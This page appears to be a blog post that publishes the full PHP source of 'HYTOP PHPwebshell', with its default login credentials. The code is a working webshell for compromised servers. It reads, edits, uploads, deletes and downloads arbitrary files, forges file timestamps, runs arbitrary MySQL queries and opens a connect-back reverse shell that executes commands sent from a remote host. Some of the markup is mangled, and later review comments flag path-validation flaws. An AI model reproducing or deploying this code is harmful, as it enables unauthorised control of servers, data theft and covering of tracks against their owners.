
PHP-webshell



用户名:lcx  密码:123

<br /><?php<br />/**<br />Thk:angle maple-x wwofeiwo Netpath<br />HYTOP PHPwebshell 0.0001ver only test windows2003+APMServ5.2.0<br />**/<br />error_reporting(1);<br />$adminu      = "lcx";<br />$adminp      = "202cb962ac59075b964b07152d234b70";<br />$url=$_SERVER&#91;&#039;PHP_SELF&#039;&#93;;<br /><br />if ($_POST&#91;&#039;sendadmin&#039;&#93; == &#039;Login&#039;) {<br />  <br />      if ( md5(trim($_POST&#91;&#039;adminpass&#039;&#93;))==$adminp&&trim($_POST&#91;&#039;adminuser&#039;&#93;)==$adminu) {<br />       setcookie ("adminpass",md5(trim($_POST&#91;&#039;adminpass&#039;&#93;)),time()+(1*24*36000));<br />       echo "<meta http-equiv=refresh content=0;URL=".$_SERVER&#91;&#039;PHP_SELF&#039;&#93;."?acton=path>";<br />       exit;<br />      }<br />}<br /><br />if (isset($_COOKIE&#91;&#039;adminpass&#039;&#93;)) {<br />      if ($_COOKIE&#91;&#039;adminpass&#039;&#93; != $adminp and trim($_POST&#91;&#039;adminuser&#039;&#93;) !=$adminu) {<br />       loginpage();<br />      }<br />} else {<br />      loginpage();<br />}<br /><br /><br />$downfile=$_GET&#91;&#039;downfilename&#039;&#93;;<br />if (!empty($downfile)) {<br />if (!@file_exists($downfile)) {<br />      echo "<script>alert(&#039;no exists!&#039;)</script>";<br />} else {<br />      $filename = basename($downfile);<br />      $filename_info = explode(&#039;.&#039;, $filename);<br />      $fileext = $filename_info&#91;count($filename_info)-1&#93;;<br />      @header(&#039;Content-type: application/x-&#039;.$fileext);<br />      @header(&#039;Content-Disposition: attachment; filename=&#039;.$filename);<br />      @header(&#039;Content-Description: PHP Generated Data&#039;);<br />      @header(&#039;Content-Length: &#039;.filesize($downfile));<br />      @readfile($downfile);<br />      exit;<br />}<br />}<br /><br />if ($_GET&#91;&#039;acton&#039;&#93;=="path"){<br />$sCwd = (substr(PHP_OS, 0, 3) == &#039;WIN&#039;) ? 
strtolower(getcwd()) : getcwd();<br />echo "webph:<br><a href=# onclick=&#92;"vbs:window.open &#039;$url?acton=list&page=$sCwd&#039;&#92;">$sCwd</a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=upload> upfile </a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=cmd> cmd </a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=phpinfo> phpinfo </a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=mysql> mysql </a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=nc> ncshell </a><br>";<br /><br />$letters = range(&#039;b&#039;,&#039;z&#039;);echo "drive:<br>";<br />foreach($letters as $drive){<br />   <br />            if (is_dir($drive.&#039;:&#039;))<br />            {<br />                $freespace                 = disk_free_space($drive.&#039;:&#039;);<br />                $total_space             = disk_total_space($drive.&#039;:&#039;);<br />                $percentage_free         = $freespace ? round($freespace / $total_space, 2) * 100 : 0;<br />                $message=&#039;: &#039;.to_readble_size($freespace).&#039; / &#039;.to_readble_size($total_space).&#039; &#91;&#039;.$percentage_free.&#039;%&#93;&#039;;<br />       echo "<a href=# language=vbscript onclick=&#92;"window.open &#039;$url?acton=list&page=$drive:&#039;&#92;" >$drive</a>$message<br>";<br />        //echo "<a href=# onclick=&#92;"vbs:location.href=&#039;?acton=list&page=$drive:&#039;&#92;">$drive</a>$message<br>";<br /><br />   <br />            }<br />        }<br />}<br /><br /><br />if ($_GET&#91;&#039;acton&#039;&#93;=="read") {<br />echo "<form action=&#039;&#039; name=frm2 method=POST> <textarea name=textarea cols=100 rows=25 >";<br />$cls=htmlentities(file_get_contents($_GET&#91;&#039;filename&#039;&#93;));<br />echo $cls;<br />echo "</textarea><INPUT type=submit name=button2 value=edit></form><br>";<br /><br />if ($_POST&#91;&#039;button2&#039;&#93;=="edit") {<br />fputs(fopen($_GET&#91;&#039;filename&#039;&#93;,&#039;w&#039;), 
stripslashes($_POST&#91;&#039;textarea&#039;&#93;));<br />echo "<script language=vbs>msgbox(&#92;"ok,read again&#92;"):location.href=window.location.href</script>";<br />   <br />}<br />}<br /><br />if ($_GET&#91;&#039;acton&#039;&#93;=="upload") {<br />      echo "<form enctype=&#039;multipart/form-data&#039; action=&#039;&#039; method=&#039;POST&#039; name=frm3>";<br />         echo "<input type=&#039;hidden&#039; name=&#039;MAX_FILE_SIZE&#039; value=&#039;300000&#039; >";<br />      echo "upload path: <input name=&#039;uploadpath&#039; type=&#039;text&#039; value=&#039;c:/&#039;>";<br />         echo "Send this file: <input name=&#039;userfile&#039; type=&#039;file&#039; >";<br />         echo "<input type=&#039;submit&#039; value=&#039;SendFile&#039; name=button3 >";<br />         echo "</form>";<br /><br />      $uploaddir = $_POST&#91;&#039;uploadpath&#039;&#93;;<br />            $uploadfile = $uploaddir . basename($_FILES&#91;&#039;userfile&#039;&#93;&#91;&#039;name&#039;&#93;);<br />            echo &#039;<pre>&#039;;<br />          if (move_uploaded_file($_FILES&#91;&#039;userfile&#039;&#93;&#91;&#039;tmp_name&#039;&#93;, $uploadfile)) {<br />            echo "File is valid, and was successfully uploaded.&#92;n";<br />           } else {<br />          echo "Possible file upload attack!&#92;n";<br />           }<br /><br />echo &#039;Here is some more debugging info:&#039;;<br />print_r($_FILES);<br /><br />       echo "

“;

}

if ($_GET['acton']==”del”) {

@unlink($_GET['filename']);

}

if ($_GET['acton']==”copy”) {

copy($_GET['filename'],$_GET['newfile']);

}

if ($_GET['acton']==”move”) {

@rename($_GET['filename'],$_GET['newfile']);

}

if ($_GET['acton']==”list”) {
list_dir(stripslashes($_GET[page]));

}

if ($_GET['acton']==”phpinfo”) {
phpinfo();
}

if($_GET['acton']==”cfiletime”){
print<<

MODIFY:

YEAR
MONTH

DAY
HOUR
MINUTE
SECOND

eof;
if ($_POST['sure']==”sure”){
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
$time=strtotime(“$data $month $year $hour:$minute:$second”);
echo (@touch($_GET['cfile'],$time)) ? $_POST['curfile'].” CHANGE “.date(“Y-m-d H:i:s”,$time).” !” : “FALSE!”;
}
}

if ($_GET['acton']==”mysql”){
print<<









eof;

if ($_POST['mysql']==”mysql”){
mysql_connect(“$_POST[host]”, “$_POST[user]”, “$_POST[pass]”) or
die(“Could not connect: ” . mysql_error());
mysql_select_db(“$_POST[db]”);
$sql=stripslashes(“$_POST[sql]”);
$result = mysql_query(“$_POST[sql]”);
echo “

";
while ($row = mysql_fetch_array($result, MYSQL_BOTH)) {

for ($j=0; $j < count($row); $j++) {
printf (" $row[$j] ");
}
echo "
";
}
mysql_free_result($result);
}
}

if ($_GET['acton']=="cmd"){
print<<




";


if ($_GET['acton']=="nc"){
if(isset($_POST['host']) && isset($_POST['port']))
{
$host = $_POST['host'];
$port = $_POST['port'];
}else{
print<<

Host:

Port:

Linux
Win



eof;
print("-------------------------------------------------------------")."
";
print("注意:win的反弹需要PHP支持socket")."
";
print(" Linux在非源码编译安装的情况一般都会支持,具体查看phpinfo()")."
";
print(" 错误信息:win保存在当目录的log.txt,Linux为/tmp/log.txt")."
";
die("欢迎测试");
}
if($_POST['info']=="win")
{
$ph=str_replace(chr(92),chr(92).chr(92),$_SERVER['SystemRoot']).chr(92).chr(92)."system32" ;
$env=array('path' => $ph);
$descriptorspec = array(
0 => array("pipe","r"),
1 => array("pipe","w"),
2 => array("file","log.txt","a"),
);
}else{
$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
$descriptorspec = array(
0 => array("pipe","r"),
1 => array("pipe","w"),
2 => array("file","/tmp/log.txt","a"),
);
}
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0)
{
die("Socket Create Faile");
}
if(($ret=socket_connect($sock,$host,$port))<0)
{
die("Connect Faile");
}else{
$message="----------------------PHP Connect-Back--------------------\n";

socket_write($sock,$message,strlen($message));
$cwd=str_replace('\\','/',dirname(__FILE__));
while($cmd=socket_read($sock,65535,$proto))
{
if(trim(strtolower($cmd))=="exit")
{
socket_write($sock,"Bye Bye\n");
exit;
}else{

$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], $cmd);
fclose($pipes[0]);

$msg=stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$return_value = proc_close($process);
}
}
}
}
}


/**
 * Print a one-level listing of $path: directories as a bare path line, files
 * with ctime, mtime, readable size and the low four octal digits of the mode.
 *
 * $path goes straight to opendir() with no validation and no base-directory
 * check; the only caller visible in this file passes stripslashes($_GET['page']),
 * so any directory the web server account can read is listable. Entry names
 * and $path are echoed without escaping. The "read copy del ... down" echo
 * looks like link markup whose tags were stripped in this copy.
 */
function list_dir($path)
{

// opendir() failure (missing or unreadable path) is not checked here.
$dh = opendir($path);
while (($dir = readdir($dh)) !== false) {
$pathurl=urlencode($path);
$dirurl=urlencode($dir);
// NOTE(review): $pathurl/$dirurl are not used by the echoes as they appear
// here; presumably the original link markup used them and was lost in the paste.
if ( $dir != "." && $dir != ".." ){


if (is_dir("$path/$dir") ){

echo "$path/$dir
";

}

// NOTE(review): this elseif has no braces, so only the $ctime assignment is
// conditional on it; the $mtime/$size/$fileperm lines and the echo below run
// for directory entries too (transcription loss or original bug — confirm).
elseif (!is_dir("$path/$dir"))

$ctime=date("Y-m-d H:i:s",filectime("$path/$dir"));
$mtime=date("Y-m-d H:i:s",filemtime("$path/$dir"));
$size=to_readble_size(filesize("$path/$dir"));
// fileperms() is @-suppressed, so a failure silently yields perms of "0".
$fileperm=substr(base_convert(@fileperms("$path/$dir"),10,8),-4);
echo " $dir ($ctime) ($mtime)($size) ($fileperm) read copy del move&rename down
";


}
}


closedir($dh);
}

/**
 * Format a byte count as a short human-readable string using decimal units.
 *
 * Thresholds are strict ">" against powers of 1000, so exactly 1000 is still
 * reported as "1000B". The scaled value is rounded to two decimals and the
 * unit is appended with no separator, e.g. 1500 -> "1.5KB".
 */
function to_readble_size($size)
{
    $unit = 'B';

    if ($size > 1000000000000) {
        $size = $size / 1000000000000;
        $unit = 'TB';
    } elseif ($size > 1000000000) {
        $size = $size / 1000000000;
        $unit = 'GB';
    } elseif ($size > 1000000) {
        $size = $size / 1000000;
        $unit = 'MB';
    } elseif ($size > 1000) {
        $size = $size / 1000;
        $unit = 'KB';
    }

    return round($size, 2) . $unit;
}

function loginpage() {
print<<







eof;

exit;
}?>


HYTOP PHPwebshell 0.0001ver code by lcx
